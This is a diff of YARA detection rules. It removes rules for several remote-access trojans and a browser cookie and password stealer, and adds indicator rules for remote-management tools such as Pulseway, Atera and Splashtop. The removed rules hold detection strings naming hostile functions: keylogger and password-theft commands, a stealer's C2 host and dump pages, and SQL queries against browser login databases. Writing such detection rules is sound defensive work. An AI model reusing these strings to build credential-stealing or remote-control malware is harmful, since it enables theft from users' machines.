 	strings:
-		$cmd1 = "command=scote_ping" fullword ascii
-		$cmd2 = "command=scote_info_ipconfig" fullword ascii
-		$cmd3 = "command=scote_info_systeminfo" fullword ascii
-		$cmd4 = "command=scote_connection|hwid=" fullword ascii
-		$cmd5 = "command=ping" fullword wide
-		$cmd6 = "command=screen_capture_init" fullword wide
-		$cmd7 = "command=screen_capture" fullword wide
-		$cmd8 = "command=silence_screenshot" fullword wide
-		$cmd9 = "command=silence_keylogger" fullword wide
-		$cmd10 = "command=silence_password" fullword wide
-		$cmd11 = "command=screen_thumb" fullword wide
-		$cmd12 = "command=filemanager_upload_tcp" fullword wide
-		$cmd13 = "command=filemanager_download" fullword wide
-		$cmd14 = "command=filemanager_init" fullword wide
-		$cmd15 = "command=filemanager_root" fullword wide
-		$cmd16 = "command=filemanager_folder_filemanager_file" fullword wide
-		$cmd17 = "command=filemanager_thumb" fullword wide
-		$cmd18 = "command=keylogger_init" fullword wide
-		$cmd19 = "command=keylogger_file" fullword wide
-		$cmd20 = "command=password_firefox" fullword wide
-		$cmd21 = "command=password_opera" fullword wide
-		$cmd22 = "command=password_chrome" fullword wide
-		$cmd23 = "command=password_all" fullword wide
-		$cmd24 = "command=password_init" fullword wide
-		$cmd25 = "command=misc_init" fullword wide
-		$cmd26 = "command=misc_process" fullword wide
-		$cmd27 = "command=misc_cmd" fullword wide
-		$cmd28 = "command=new_rcs" fullword wide
-		$cmd29 = "command=microphone_capture" fullword wide
-		$cmd30 = "command=microphone_capture_init" fullword wide
-		$cmd31 = "command=rvmedia_capture_init" fullword wide
-		$cmd32 = "command=rvmedia_list" fullword wide
-		$cmd33 = "command=rvmedia_resolution" fullword wide
-		$cmd34 = "command=webcam_capture_init" fullword wide
-		$cmd35 = "command=webcam_list" fullword wide
-		$cmd36 = "command=webcam_resolution" fullword wide
-		$cmd37 = "command=webcam_capture" fullword wide
-		$gcmd1 = "filemanager_download_ftp" fullword wide
-		$gcmd2 = "download_file_ftp" fullword wide
-		$gcmd3 = "filemanager_upload_http" fullword wide
-		$gcmd4 = "upload_file_http" fullword wide
-		$gcmd5 = "upload_url" fullword wide
-		$gcmd6 = "filemanager_delete" fullword wide
-		$gcmd7 = "filemanager_execute_file" fullword wide
-		$gcmd8 = /(microphone|webcam|rvmedia|keylogger|password|screen|filemanager)_(host|port|guid)/ nocase
-		$confs1 = "[nick_name]" fullword ascii
-		$confe1 = "[/nick_name]" fullword ascii wide
-		$confs2 = "[install_name]" fullword ascii wide
-		$confe2 = "[/install_name]" fullword ascii wide
-		$confs3 = "[install_folder]" fullword ascii wide
-		$confe3 = "[/install_folder]" fullword ascii wide
-		$confs4 = "[reg_startup]" fullword ascii wide
-		$confe4 = "[/reg_startup]" fullword ascii wide
-		$confs5 = "[folder_startup]" fullword ascii wide
-		$confe5 = "[/folder_startup]" fullword ascii wide
-		$confs6 = "[task_startup]" fullword ascii wide
-		$confe6 = "[/task_startup]" fullword ascii wide
-		$confs7 = "[injection]" fullword ascii wide
-		$confe7 = "[/injection]" fullword ascii wide
-		$confs8 = "[injection_process]" fullword ascii wide
-		$confe8 = "[/injection_process]" fullword ascii wide
-		$confs9 = "[connection]" fullword ascii wide
-		$confe9 = "[/connection]" fullword ascii wide
+		$s1 = "MM.Monitor." ascii
+		$s2 = "RDAgentSessionSettingsV" ascii
+		$s3 = "CheckForMacOSRemoteDesktopUpdateCompletedEvent" ascii
+		$s4 = "ConfirmAgentStarted" ascii
+		$s5 = "GetScreenshot" ascii
+		$s6 = "UnloadRemoteDesktopDlls" ascii
+		$s7 = "CtrlAltDeleteProc" ascii
+		$s8 = "$7cfc3b88-6dc4-49fc-9f0a-bf9e9113a14d" ascii
+		$s9 = "computermonitor.mmsoft.ro" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 2 of ( $cmd* ) or 7 of ( $gcmd* ) or ( 2 of ( $confs* ) and 2 of ( $confe* ) ) or ( pe.exports ( "__elite" ) and 2 of them ) ) ) or ( 15 of them )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Scouteliteps
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_Remotedesktop : FILE
 {
 	meta:
-		description = "Detects actor PowerShell tool designed to steal browsers session cookie and passwords on-disk and in-memory"
-		author = "ditekshen"
-		id = "d2c04d55-9bf7-54f5-8053-835fa60f19cb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11534-L11569"
+		description = "Detects Pulseway Rempte Desktop client"
+		author = "ditekSHen"
+		id = "8bca3cef-b24f-597a-a6e2-86040ed726f4"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L268-L286"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b1047b8b485fcfa29225f53674050703d32498cfa99654c8ac5f8bfac29878e"
+		logic_hash = "a542c11f21ab48f4da69df4e7cb46531658a714687e2c2f8ccf78dc2a0338b68"
 		score = 75
-		quality = 37
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.PulseWay"
 
 	strings:
-		$cnc1 = "http://beginpassport.com" ascii wide nocase
-		$cnc2 = "f_dump.php" ascii wide nocase
-		$cnc3 = "c_dump.php" ascii wide nocase
-		$cnc4 = "o_dump.php" ascii wide nocase
-		$db1 = "\\Google\\Chrome\\User Data\\Default\\Cookies" ascii wide nocase
-		$db2 = "\\Mozilla\\Firefox\\Profiles\\*.default" ascii wide nocase
-		$db3 = "\\Opera Software\\Opera Stable\\Cookies" ascii wide nocase
-		$db4 = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default" ascii nocase
-		$db5 = "$($env:APPDATA)\\Mozilla\\Firefox\\Profiles\\*.default" ascii nocase
-		$db6 = "$($env:APPDATA)\\Opera Software\\Opera Stable" ascii nocase
-		$cond1 = "SSID" ascii wide
-		$cond2 = "MSPAuth" ascii wide
-		$cond3 = "\"'T'\"" ascii wide
-		$cond4 = "SNS_AA" ascii wide
-		$cond5 = "X-APPLE-WEBAUTH-TOKEN" ascii wide
-		$sql1 = "SELECT * FROM 'cookies' WHERE host_key LIKE $" ascii wide nocase
-		$sql2 = "SELECT * FROM 'moz_cookies' WHERE host LIKE $" ascii wide nocase
-		$sql3 = "SELECT origin_url, username_value ,password_value FROM 'logins'" ascii nocase
-		$def1 = "Add-Type -AssemblyName System.Security" ascii wide nocase
-		$def2 = "System.Security.SecureString" ascii wide nocase
-		$def3 = "ConvertFrom-SecureString" ascii wide nocase
-		$def4 = "[System.Security.Cryptography.ProtectedData]::Unprotect(" ascii wide nocase
-		$def5 = "[Security.Cryptography.DataProtectionScope]::LocalMachine" ascii wide nocase
-		$def6 = "[Security.Cryptography.DataProtectionScope]::CurrentUser" ascii wide nocase
-		$def7 = "System.Data.SQLite.SQLiteConnection" ascii wide nocase
-		$def8 = "[Environment]::OSVersion.ToString().Replace(\"Microsoft Windows \"," ascii wide nocase
-		$def9 = "Start-Sleep" ascii wide nocase
+		$s1 = "RemoteControl" ascii
+		$s2 = "MM.Monitor.RemoteDesktopClient." ascii
+		$s3 = "MM.Monitor.RemoteControl" ascii
+		$s4 = "RemoteDesktopClientUpdateInfo" ascii
+		$s5 = "ShowRemoteDesktopEnabledSystemsOnly" ascii
+		$s6 = "$31f50968-d45c-49d6-ace9-ebc790855a51" ascii
 
 	condition:
-		(1 of ( $cnc* ) and any of ( $db* ) and any of ( $cond* ) and any of ( $sql* ) and 7 of ( $def* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Houdiniconfig : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_CERT : FILE
 {
 	meta:
-		description = "Detects Houdini Trojan configurations"
-		author = "ditekshen"
-		id = "e4f974fe-731e-55a8-aa5f-068a1e62f54d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11600-L11616"
+		description = "Detects PulseWay by (default) certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "e00f51dc-261e-5a38-89ed-1899d9b522d4"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L288-L302"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70a67c9a91d2f82184f1d7a5ea51de911a054dd4e38e2cc36f495ed59219afab"
+		logic_hash = "c667caa9b7de4b166630c66e5162071948fa93c68b1cdb3038fce28e13dcb1a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "install_name="
-		$s2 = "nick_name="
-		$s3 = "install_folder="
-		$s4 = "reg_startup="
-		$s5 = "startup_folder_startup="
-		$s6 = "task_startup="
-		$s7 = "injection="
-		$s8 = "injection_process"
-
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "MMSOFT Design Ltd." )
 }
-rule DITEKSHEN_MALWARE_Win_Houdini : FILE
+rule DITEKSHEN_INDICATOR_RMM_Manageengine_Zohomeeting : FILE
 {
 	meta:
-		description = "Detects the raw binary of the Houdini Trojan Delphi variant"
-		author = "ditekshen"
-		id = "79681ca3-b956-52d4-81b8-b3bd4c86872a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11618-L11689"
+		description = "Detects ManageEngine Zoho Meeting (dc_rds.exe)"
+		author = "ditekSHen"
+		id = "b15efdd1-323c-5ed6-894d-b44f04d2eaf3"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L304-L324"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0580d2525d9d989f98e815dd98b9258724b6e31f058092132c0fbd67cbc5c63c"
+		logic_hash = "8066bcd17245efcc73f2bef7f022ad23ab648fe0ad15ca66c0d387ce4eda998b"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.ManageEngine-ZohoMeeting"
 
 	strings:
-		$hc = "houdiniclient" ascii wide nocase
-		$mk1 = "keylogger_thread" fullword ascii
-		$mk2 = "keyloger_host" fullword ascii
-		$mk3 = "keylogger_port" fullword ascii
-		$mk4 = "keylogger_thread" fullword ascii
-		$mk5 = "keylogger_init" fullword wide
-		$mk6 = "keylogger_stop" fullword wide
-		$mk7 = "keylogger_offline" fullword wide
-		$mk8 = "silence_keylogger" fullword wide
-		$ms1 = "screenshot_thread" fullword ascii
-		$ms2 = "screen_host" fullword ascii
-		$ms3 = "screen_port" fullword ascii
-		$ms4 = "screenshot_init" fullword wide
-		$ms5 = "screenshot_start" fullword wide
-		$ms6 = "screenshot_stop" fullword wide
-		$ms7 = "screen_thumb" fullword wide
-		$ms8 = "silence_screenshot" fullword wide
-		$mf1 = "file_manager_init" fullword wide
-		$mf2 = "file_manager_root" fullword wide
-		$mf3 = "file_manager_faf" fullword wide
-		$mf4 = "file_manager_download" fullword wide
-		$mf5 = "file_manager_upload" fullword wide
-		$mf6 = "file_manager_stop" fullword wide
-		$mf7 = "file_manager_delete_folder" fullword wide
-		$mf8 = "file_manager_rename_folder" fullword wide
-		$mf9 = "file_manager_rename_file" fullword wide
-		$mf10 = "file_manager_delete_file" fullword wide
-		$mf11 = "file_manager_execute_file" fullword wide
-		$mf12 = "file_manager_thumb" fullword wide
-		$mf13 = "file_manager_upload_http" fullword wide
-		$mf14 = "file_manager_upload_tcp" fullword wide
-		$mf15 = "upload_file_tcp" fullword wide
-		$mf16 = "download_file_tcp" fullword wide
-		$mf17 = "upload_file_http" fullword wide
-		$mf18 = "filemanager_host" fullword ascii
-		$mf19 = "filemanager_port" fullword ascii
-		$mf20 = "filemanager_thread" fullword ascii
-		$mp1 = "password_value" fullword wide
-		$mp2 = "password_init" fullword wide
-		$mp3 = "password_stop" fullword wide
-		$mp4 = "password_firefox" fullword wide
-		$mp5 = "password_chrome" fullword wide
-		$mp6 = "password_all" fullword wide
-		$mp7 = "password_host" fullword ascii
-		$mp8 = "password_port" fullword ascii
-		$mp9 = "password_thread" fullword ascii
-		$mm1 = "misc_init" fullword wide
-		$mm2 = "misc_stop" fullword wide
-		$mm3 = "misc_process_list" fullword wide
-		$mm4 = "misc_module_list" fullword wide
-		$mm5 = "misc_process_terminate" fullword wide
-		$mm6 = "misc_host" fullword ascii
-		$mm7 = "misc_port" fullword ascii
-		$mm8 = "misc_thread" fullword ascii
-		$pl1 = "plugin_file_init" fullword wide
-		$pl2 = "plugin_url_init" fullword wide
-		$pl3 = "plugin_stop" fullword wide
+		$s1 = "bin\\ClientAuthHandler.dll" wide
+		$s2 = "AgentHook.dll" wide
+		$s3 = "UEMS - Remote Control" wide
+		$s4 = "Install hook...." wide
+		$s5 = "india.adventnet.com/meet.sas?k=" ascii
+		$s6 = "dcTcpSocket::" ascii
+		$s7 = "%s/%s?clientId=%s&sessionId=%s&clientName=%s&ticket=%s&connectionId=%s" ascii
+		$s8 = ".\\engines\\ccgost\\gost_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Lighthand : FILE
+rule DITEKSHEN_INDICATOR_RMM_Atera : FILE
 {
 	meta:
-		description = "Detects LightHand"
-		author = "ditekshen"
-		id = "2b644dfb-f09a-50a5-8260-7b7022bce1f4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11691-L11718"
+		description = "Detects Atera. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "9801f5c9-bc1e-5502-8bca-ee1f5ca0f497"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L345-L366"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f06467a522b786045839e6b22b888cecc554b0f63cc20dc43dc0f8ec80f5654"
+		logic_hash = "dbc37a941b38d36ea9bc31880c3cba6cd2b88b534583e86741f7686fcb410235"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.Atera"
 
 	strings:
-		$x1 = "27.102." ascii
-		$x2 = "109.248.150.179" fullword ascii
-		$s1 = /Hello (Client|Server)/ fullword ascii
-		$s2 = "%s|%s|%s|%s|%s|%s|" fullword wide
-		$s3 = "%s\\cmd.exe" fullword wide
-		$s4 = "Remote PC" fullword wide
-		$s5 = { 2e 62 61 74 [3-4] 3a 4c 31 0d 0a 64 65 6c
-                20 2f 46 20 22 25 73 22 0d 0a 69 66 20 65 78 69
-                73 74 20 22 25 73 22 20 67 6f 74 6f 20 4c 31 0d
-                0a 64 65 6c 20 2f 46 20 22 25 73 22 0d 0a 00 00
-                6f 70 65 6e }
-		$s6 = { 25 00 2e 00 32 00 66 00 47 00 42 00 00 00 00 00
-                25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00
-                0a 00 00 00 00 00 00 00 5c 00 2a 00 2e 00 2a 00
-                00 00 00 00 0a 00 00 00 2e 00 00 00 2e 00 2e 00
-                00 00 00 00 00 00 00 00 46 00 6f 00 6c 00 64 00
-                65 00 72 00 00 00 00 00 25 00 73 00 5c 00 25 00
-                73 00 00 00 00 00 00 00 25 00 64 00 42 00 00 00
-                25 00 2e 00 31 00 66 00 4b 00 42 00 00 00 00 00
-                25 00 2e 00 31 00 66 00 4d 00 42 }
+		$s1 = "SOFTWARE\\ATERA Networks\\AlphaAgent" wide
+		$s2 = "Monitoring & Management Agent by ATERA" ascii wide
+		$s3 = "agent-api-{0}.atera.com" wide
+		$s4 = "agent-api.atera.com" wide
+		$s5 = "acontrol.atera.com" wide
+		$s6 = /Agent\/(PingReply|GetCommandsFallback|GetCommands|GetTime|GetEnvironmentStatus|GetRecurringPackages|AgentStarting|AcknowledgeCommands)/ wide
+		$s7 = "\\AlphaControlAgent\\obj\\Release\\AteraAgent.pdb" ascii
+		$s8 = "AteraWebAddress" ascii
+		$s9 = "AlphaControlAgent.CloudLogsManager+<>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Validalpha : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Atera_CERT : FILE
 {
 	meta:
-		description = "Detects ValidApha / BlackRAT"
-		author = "ditekshen"
-		id = "3162eb5f-6e2d-598a-b199-22b70ec8a773"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11720-L11736"
+		description = "Detects Atera by certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "a5ccb684-1e28-51c8-a4d6-0b5abba97de0"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L368-L383"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "54d170076d1b32cee6f6252d40548acc7e23b467d692c59d6146a8aadf431211"
+		logic_hash = "f51fef767cd529271f06d578146634e1ab5ee5ac3ffb829cbaa870e7c69ca3f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "RAT/Black/" ascii
-		$x2 = "RAT/Black/Client_Go/" ascii
-		$s1 = "main.RunTask" fullword ascii
-		$s2 = "main.CmdShell" fullword ascii
-		$s3 = "main.SelfDelete" fullword ascii
-		$s4 = "main.RecvPacket" fullword ascii
-		$s5 = "main.FileDownload" fullword ascii
-		$s6 = "main.CaptureScreen" fullword ascii
-		$s7 = "main.PeekNamedPipe" fullword ascii
+		clamav1 = "INDICATOR.Win.RMM.Atera"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Atera Networks Ltd" )
 }
-rule DITEKSHEN_MALWARE_Win_Tigerrat : FILE
+rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer : FILE
 {
 	meta:
-		description = "Detects TigerRAT"
-		author = "ditekshen"
-		id = "37192fc8-1932-5f33-994a-bb319b131c58"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11738-L11756"
+		description = "Detects Splashtop Streamer. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "317f2be4-983f-5528-b629-75a13de7b411"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L385-L403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38a238339db7e7f573e0c7362af5a08654a9e134f902c0ecae441250a0364c64"
+		logic_hash = "67181cd6ae071074c6bf35f44963c11c9ee9b7df242027c15b1e165d108f7b98"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.SplashtopStreamer"
 
 	strings:
-		$m0 = ".?AVCryptorRC4@@" fullword ascii
-		$m1 = ".?AVModuleShell@@" fullword ascii
-		$m2 = ".?AVModuleKeyLogger@@" fullword ascii
-		$m3 = ".?AVModuleSocksTunnel@@" fullword ascii
-		$m4 = ".?AVModuleScreenCapture@@" fullword ascii
-		$m5 = ".?AVModulePortForwarder@@" fullword ascii
-		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
-		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
-		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
-		$s4 = "~KPTEMP" fullword wide
-		$s5 = "del \"%s\"%s \"%s\" goto " ascii
+		$s1 = "\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\" ascii
+		$s2 = ".api.splashtop.com" wide
+		$s3 = "Software\\Splashtop Inc.\\Splashtop" wide
+		$s4 = "restarted the streamer.%nApp version: %1" wide
+		$s5 = "Splashtop-Splashtop Streamer-" wide
+		$s6 = "[RemoveStreamer] Send msg 2 cloud(%d:%d:%d)" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) or ( 5 of ( $m* ) ) or ( 3 of ( $m* ) and 2 of ( $s* ) ) or ( 5 of them ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Ktlvdoor : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer_CERT : FILE
 {
 	meta:
-		description = "Detects KTLVdoor"
-		author = "ditekshen"
-		id = "f63ebd05-fb4b-50fb-887b-dacd379594a4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11758-L11791"
+		description = "Detects Splashtop Streamer by certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "7e0e4d6f-38a3-5cac-8a82-8aea7943d373"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L405-L419"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ced9b558c7e17acd015cd2c9dd0c5d024bf9c31c7f2e7c9b7b937124109cf8b"
+		logic_hash = "0a1225a79ff30678846b9cb4315419be04b46276b3e05310a21d088b30f01b72"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "/cmd/acc/agent_acc" ascii
-		$s2 = "main.DLLWMain" ascii
-		$s3 = "main.checkSilent" ascii
-		$h1 = ".handleInteractiveShell" ascii
-		$h2 = ".handleNetstat" ascii
-		$h3 = ".handleProcess" ascii
-		$h4 = ".handleRefreshHostInfo" ascii
-		$h5 = ".handleTimestomp" ascii
-		$h6 = ".handleSoInject" ascii
-		$h7 = ".HandleRegInfo" ascii
-		$h8 = ".handlePortscan" ascii
-		$h9 = ".handleReflectDllInject" ascii
-		$h10 = ".handleFileDownload" ascii
-		$f1 = ".RdpWithNTLM." ascii
-		$f2 = ".FingerPrintOs." ascii
-		$f3 = ".ScanWMI." ascii
-		$f4 = ".ScanWinRM." ascii
-		$f5 = ".ScanWeb." ascii
-		$f6 = ".ScanSmb2." ascii
-		$f7 = ".ScanRDP." ascii
-		$f8 = ".ScanPing." ascii
-		$f9 = ".ScanOxid." ascii
-		$f10 = ".ScanMssql." ascii
-		$f11 = ".ScanBanner." ascii
-		$fr1 = /\.proxy[CS]2[CS](TC|UD)P/ ascii
-		$fr2 = /\.Scan(WMI|WinRM|Web|Smb2|RDP|Ping|Oxid|Mssql|Banner)\./ ascii
-
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 6 of ( $h* ) ) or ( 12 of ( $f* ) ) or ( 2 of ( $h* ) and 4 of ( $f* ) ) or ( 1 of ( $s* ) and ( 4 of ( $h* ) or 4 of ( $f* ) ) ) or ( 13 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Splashtop Inc." )
 }
-rule DITEKSHEN_MALWARE_Win_Fakecaptcha_Downloader : FILE
+rule DITEKSHEN_INDICATOR_RMM_Aeroadmin : FILE
 {
 	meta:
-		description = "Detects downloader executables dropped by fake captcha"
-		author = "ditekshen"
-		id = "d577e8ef-11df-565c-9925-63b8768a7115"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11793-L11803"
+		description = "Detects AeroAdmin. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "0f69c6da-40e4-5952-b6f9-ed401279eb9e"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L421-L442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "57c39ce93f74d03767e7fde53281983a8462e4f3705d1bb9084bc169a08a0f83"
+		logic_hash = "a0a9e15f31b6b06fbc749b863563c30351c775c1b1d17952013670e7e1d68c41"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
 
 	strings:
-		$s1 = "</script>MZ" ascii
-		$s2 = "window.close();" ascii
-		$s3 = "eval(" ascii
+		$s1 = "\\AeroAdmin" wide
+		$s2 = ".aeroadmin.com" ascii wide
+		$s3 = "XAeroadminAppRestarter" wide
+		$s4 = "SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\AeroadminService" wide
+		$s5 = "AeroAdmin {}" ascii
+		$s6 = "FAeroAdmin.cpp" fullword ascii
+		$s7 = "Referer: http://900100.net" ascii
+		$s8 = "POST /sims/sims_new.php" ascii
+		$s9 = "aeroadmin.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Xenorat : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Aeroadmin_CERT : FILE
 {
 	meta:
-		description = "Detects Blacksuit"
-		author = "ditekshen"
-		id = "7f27ebef-8a0e-591a-a926-ac950db86053"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11805-L11820"
+		description = "Detects AeroAdmin by certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "ca34fd3c-eb76-57e3-8b62-ab0d0c9ec7b3"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L444-L461"
